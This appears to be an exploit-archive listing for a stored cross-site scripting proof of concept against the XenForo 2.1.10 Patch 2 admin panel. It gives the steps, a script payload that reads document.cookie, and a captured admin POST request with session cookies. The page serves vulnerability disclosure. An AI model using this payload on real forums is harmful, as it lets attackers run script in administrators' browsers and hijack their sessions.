XenForo 2.1.10 Patch 2 Cross Site Scripting

XenForo 2.1.10 Patch 2 Cross Site Scripting: Posted Aug 17, 2020; Authored by Vincent666 ibn Winnie; XenForo version 2.1.0 Patch 2 suffers from a cross site scripting vulnerability.; tags | exploit, xss; SHA-256 | dc51a83e717b75116c25528d1b3a8342dafcd2220bbfe77a7e2298e2a0ad11cf; Download | Favorite | View

XenForo 2.1.10 Patch 2 Cross Site Scripting

# Exploit Title: XenForo v2.1.10 Patch 2 Stored XSS
# Date:16.08.2020
# Author: Vincent666 ibn Winnie
# Software Link: https://xenforo.com/demo/
# Tested on: Windows 10
# Web Browser: Mozilla Firefox
# Blog :https://pentest-vincent.blogspot.com/
# PoC :https://pentest-vincent.blogspot.com/2020/08/xenforo-v2110-patch-2-stored-xss.html

PoC:

I use demo XenForo Admin panel for test.
Create demo site:
https://xenforo.com/demo/
Login:admin
Password:admin
Go to the Admin panel -> open Content-> bb codes->Add bb code

Put xss code in field "Title" or "Description" or other and save this.

Xss code:

"""><script>alert(document.cookie)</script><script>alert("Stored XSS
XenForo")</script>

We have a stored xss.

Picture:

https://imgur.com/a/sfE6DwZ

Video:

https://www.youtube.com/watch?v=eIJwP0Y1luQ&feature=youtu.be

https://27ff066882409b73.demo-xenforo.com/2110p2/admin.php?bb-codes/save
Host: 27ff066882409b73.demo-xenforo.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://27ff066882409b73.demo-xenforo.com/2110p2/admin.php?bb-codes/add
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=---------------------------3006497114009
Content-Length: 2530
Origin: https://27ff066882409b73.demo-xenforo.com
Connection: keep-alive
Cookie: 2110p2_csrf=R0-3YLvAUaqs1EVL;
2110p2_user=1%2CK6XXrhPx4KhqByRM3saOr3gOzYJ0_-8cA-qKDEcw;
2110p2_session=m0BX5XYtnGIc5HogKPEcY2jwdZrOd95u;
2110p2_session_admin=bru_eXQSO-jIXtAaESSJDoD69BLcIiVd
bb_code_id=test&title=""><script>alert("Stored XSS
XenForo")</script>&desc=&bb_code_mode=replace&has_option=no&replace_html=&callback_class=&callback_method=&editor_icon_type=&example=&output=&allow_signature=1&active=1&addon_id=&option_regex=&trim_lines_after=0&replace_html_email=&replace_text=&_xfToken=1597585880,aa740358187e6579a880755adc20d9ba,1597585880,aa740358187e6579a880755adc20d9ba&_xfRequestUri=/2110p2/admin.php?bb-codes/add&_xfWithData=1&_xfResponseType=json
POST: HTTP/1.1 200 OK

Date: Sun, 16 Aug 2020 13:51:29 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/7.2.12
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Last-Modified: Sun, 16 Aug 2020 13:51:29 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, max-age=0
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 254
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: application/json; charset=utf-8

Top Authors In Last 30 Days

Red Hat 249 files
indoushka 168 files
Jay Turla 150 files
Ubuntu 89 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Gentoo 25 files
Karn Ganeshen 23 files

File Archives

Systems

AIX (430)
Apple (2,115)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,126)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,592)
HPUX (881)
iOS (390)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,362)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (16,911)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,882)
UNIX (9,459)
UnixWare (188)
Windows (6,777)
Other

XenForo 2.1.10 Patch 2 Cross Site Scripting

XenForo 2.1.10 Patch 2 Cross Site Scripting

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

XenForo 2.1.10 Patch 2 Cross Site Scripting

Share This

XenForo 2.1.10 Patch 2 Cross Site Scripting

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems